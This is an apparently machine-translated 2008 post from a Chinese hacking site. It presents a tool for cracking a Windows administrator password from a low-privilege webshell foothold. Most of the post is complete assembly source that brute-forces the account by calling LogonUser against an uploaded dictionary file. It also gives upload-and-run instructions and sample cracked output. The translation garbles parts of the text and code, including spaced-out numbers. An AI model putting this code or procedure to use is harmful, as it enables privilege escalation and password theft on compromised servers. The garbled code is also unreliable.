Webshell under to crack computer administrator password-vulnerability warning-the black bar safety net

2008-10-26T00:00:00
ID MYHACK58:62200820812
Type myhack58
Reporter 佚名
Modified 2008-10-26T00:00:00

Description

Information source: evil octal information security team www.eviloctal.com)

This idea derived from previous studies runas command when inspired.

Method of use: 1, The your password dictionary was renamed into the psw. txt, upload to the target server is an executable, writable directory. It is assumed that this directory is: c:\windows\temp\ 2, The program upload to the c:\windows\temp\, and then run it. 3, and then is wait a few minutes(specific time to see your dictionary size. access to c:\windows\temp\under the result_. txt in the result, If it is empty it shows also not crack the finish, another time and then come back to see.

Features: No need to grab the hash, don't need administrator permissions, the ISUR_*the user will be able to use, slow this is also the characteristics of Oh in the test machine's performance is every seconds try 1 8 0 0 A A password so. Default crack the administrator user's password. To break Other, please self-modifying code.

result_. txt example:

The administrator's password is: tester The program had tried 3 2 6 5 3 times! :) Use time:0 hour(s) 0 minute(s) 17.109 second(s),average speed: 1 9 0 8 times/s.


The source code is as follows: AdminPassCrack. asm file

; ; By taiwansee 2008.10.23 ; ; Use nmake or the following command to compile and link: ; ml /c /coff AdminPassCracker. asm ; Link /subsystem:windows AdminPassCracker. obj ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> .386 . model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include file definition ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows. inc include user32. inc includelib user32. lib include kernel32. inc includelib kernel32. lib include Advapi32. inc includelib Advapi32. lib include _TotalTime. asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Data segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> . const DEBUG equ 0

LOGON32_LOGON_NETWORK equ 3 LOGON32_PROVIDER_DEFAULT equ 0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Data segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> align 4 . data? hModuleHandle DWORD ? szFileName BYTE MAX_PATH dup(?)

. data

szResultFile BYTE 'result_.txt',0 szPswDic BYTE 'psw.txt',0 szDomain BYTE '.', 0 szUserName BYTE 'administrator',0

szResultFileFormat BYTE 'The administrator',27h,'s password is: %s',0dh,0ah BYTE 'The program had tried %d times! :)',0dh,0ah,0

szNoDicFileErr BYTE 'Sorry,dic file not exists.', 0 szCreateFileMappingErr BYTE 'CreateFileMapping Error!', 0 szMapViewOfFileErr BYTE 'MapViewOfFile Error!', 0 szNotFound BYTE 'Password not found! :(',0dh,0ah,0

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Code segment ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> > . code align 4

_WinMain proc local @hPswDic:DWORD,\ @szPswTmp[MAX_PATH]:BYTE,\ @dwPswDicFileSize:DWORD,\ @hResultFile:DWORD,\ @dwWritten:DWORD,\ @hPswDicFileMap:DWORD,\ @hToken:DWORD,\ @dwTriedTimes:DWORD,\ @szBuf[MAX_PATH]:BYTE,\ @dwContentLength:DWORD,\ @lpPswDic:DWORD,\ @lpNext:DWORD,\ @lpStart:DWORD,\ @dwStart:DWORD

;Create file to record the results. invoke CreateFile,offset szResultFile,GENERIC_READ or GENERIC_WRITE,\ FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,\ FILE_ATTRIBUTE_NORMAL,NULL . if eax == INVALID_HANDLE_VALUE jmp _Error_Exit . endif mov @hResultFile,eax ;Open the Dictionary file. invoke CreateFile,offset szPswDic,GENERIC_READ,\ FILE_SHARE_READ,NULL,OPEN_EXISTING,\ FILE_ATTRIBUTE_NORMAL,NULL . if eax == INVALID_HANDLE_VALUE invoke WriteFile,@hResultFile,offset szNoDicFileErr,sizeof szNoDicFileErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @hPswDic,eax

invoke GetFileSize,@hPswDic,NULL mov @dwPswDicFileSize,eax ;*CreateFileMapping* invoke CreateFileMapping,@hPswDic,NULL,PAGE_READONLY,0,0,NULL . if eax==NULL invoke WriteFile,@hResultFile,offset szCreateFileMappingErr,\ sizeof szCreateFileMappingErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @hPswDicFileMap,eax ;*MapViewOfFile* invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0 . if eax==NULL invoke WriteFile,@hResultFile,offset szMapViewOfFileErr,\ sizeof szMapViewOfFileErr,addr @dwWritten,NULL jmp _Error_Exit . endif mov @lpPswDic,eax mov @lpNext,eax mov @lpStart,eax

invoke GetTickCount ;calculated using the number of milliseconds,starting mov @dwStart,eax

xor ecx,ecx ;the statistics have been analyzed the number of characters xor eax,eax mov @dwTriedTimes,eax ;statistics the number of attempts

. while TRUE cld mov esi,@lpStart lea edi,@szPswTmp @@: lodsb . if al!= 0dh stosb inc ecx . if ecx==@dwPswDicFileSize jmp @F . elseif ecx>@dwPswDicFileSize jmp _NotFound . endif jmp @B . endif @@: add ecx,2 xor eax,eax stosw ;with 0 at the end

lea eax,[esi+1] mov @lpNext,eax ;correction to the next password

push ecx ;save count value invoke LogonUser,offset szUserName,offset szDomain,addr @szPswTmp,\ LOGON32_LOGON_NETWORK,\ LOGON32_PROVIDER_DEFAULT,\ addr @hToken . if eax==NULL pop ecx ;restore the count value of the

push @lpNext pop @lpStart

inc @dwTriedTimes . continue . else pop ecx ;the stack balance . break . endif . endw

invoke GetTickCount ;calculated using the number of milliseconds,the end of the sub eax,@dwStart mov @dwStart,eax

invoke wsprintf,addr @szBuf,offset szResultFileFormat,addr @szPswTmp,@dwTriedTimes invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

invoke _TotalTime,addr @szBuf,@dwStart,@dwTriedTimes,NULL invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

xor eax,eax inc eax ret

_NotFound: invoke GetTickCount ;calculated using the number of milliseconds,starting sub eax,@dwStart mov @dwStart,eax

invoke lstrcpy,addr @szBuf,offset szNotFound invoke _TotalTime,addr @szPswTmp,@dwStart,@dwTriedTimes,NULL invoke lstrcat,addr @szBuf,addr @szPswTmp

invoke lstrlen,addr @szBuf mov @dwContentLength,eax

invoke WriteFile,@hResultFile,addr @szBuf,\ @dwContentLength,addr @dwWritten,NULL

_Error_Exit: xor eax,eax ret _WinMain endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: invoke GetModuleHandle,NULL mov hModuleHandle,eax invoke GetModuleFileName,hModuleHandle,offset szFileName,sizeof szFileName invoke lstrlen,offset szFileName cld mov esi,offset szFileName add esi,eax std @@: lodsb cmp al,5ch jne @B mov byte ptr [esi+2],0 cld invoke SetCurrentDirectory,offset szFileName call _WinMain invoke ExitProcess,NULL ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>> end start _TotalTime. asm file

szResultFormat BYTE 'Use time:%d hour(s) %d minute(s) %d.% 03d second(s),average speed: %d times/s.', 0dh,0ah,0

. code ;******** ; _TotalTime ;_lpBuf for the caller to provide the received result buffer ;_dwTotalTime for the total time, in General, the front has ;invoke GetTickCount ;sub eax,@dwStart ;These two instructions ;_dwThingsHappend for the timing period, the event of interest occurs to the number of ;_FutrueExtention for future development with ;******** _TotalTime proc _lpBuf,_dwTotalTime,_dwThingsHappend,_FutrueExtention

local @dwStart:DWORD,\ @dwMilliseconds:DWORD,\ @dwSecond:DWORD,\ @dwMinute:DWORD,\ @dwHour:DWORD,\ @dwSus:DWORD,\ @AVGSpeed:DWORD

mov eax,_dwTotalTime ;In terms of time xor edx,edx mov ebx,1 0 0 0 div ebx mov @dwMilliseconds,edx ;MS

xor edx,edx mov ebx,6 0 div ebx mov @dwSecond,edx

xor edx,edx mov ebx,6 0 div ebx mov @dwMinute,edx

xor edx,edx mov ebx,2 4 div ebx mov @dwHour,edx

;Calculate the average speed:_dwThingsHappend÷_dwTotalTime xor edx,edx

mov eax,_dwThingsHappend ;_dwThingsHappend also expanded 1 0 0 0 times(because _dwTotalTime time is number of milliseconds) mov ebx,1 0 0 0 mul ebx

mov ebx,_dwTotalTime ;the _dwTotalTime the values are restored to ebx . if ebx!= 0 div ebx mov @AVGSpeed,eax . else ;if _dwTotalTime is 0,indicating that run time is too small,can not count,here with _dwThingsHappend as@AVGSpeed. push _dwThingsHappend pop @AVGSpeed . endif

invoke wsprintf,_lpBuf,\ offset szResultFormat,\ @dwHour,\ @dwMinute,\ @dwSecond,\ @dwMilliseconds,\ @AVGSpeed

xor eax,eax inc eax ret _TotalTime endp